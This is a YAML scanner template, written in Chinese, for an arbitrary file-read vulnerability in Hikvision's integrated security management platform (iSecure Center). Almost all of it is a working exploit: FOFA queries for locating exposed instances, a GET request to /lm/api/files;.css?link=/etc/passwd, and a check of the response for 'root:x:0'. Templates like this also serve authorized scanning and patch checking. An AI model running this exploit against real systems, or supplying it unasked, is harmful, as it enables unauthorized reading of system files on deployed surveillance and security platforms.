product: 海康威视综合安防管理平台
vName: 海康威视综合安防管理平台 files任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 海康威视综合安防管理平台是一款基于云计算、大数据、人工智能技术构建的智能化综合安防平台。该平台能够对监控视频进行进行全面的数据分析，支持整个安防生命周期的管理，包括布控预案管理、事件管理、报警处理、安全大数据分析等，实现对安防系统的实时监控和智能预警。lm/api/files;.css路径存在
version: ''
note: ''
search:
  FOFA: app="HIKVISION-综合安防管理平台" || app="HIKVISION-iSecure-Center"
protocol: http
link: https://blog.csdn.net/fushuang333/article/details/135291856
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /lm/api/files;.css?link=/etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and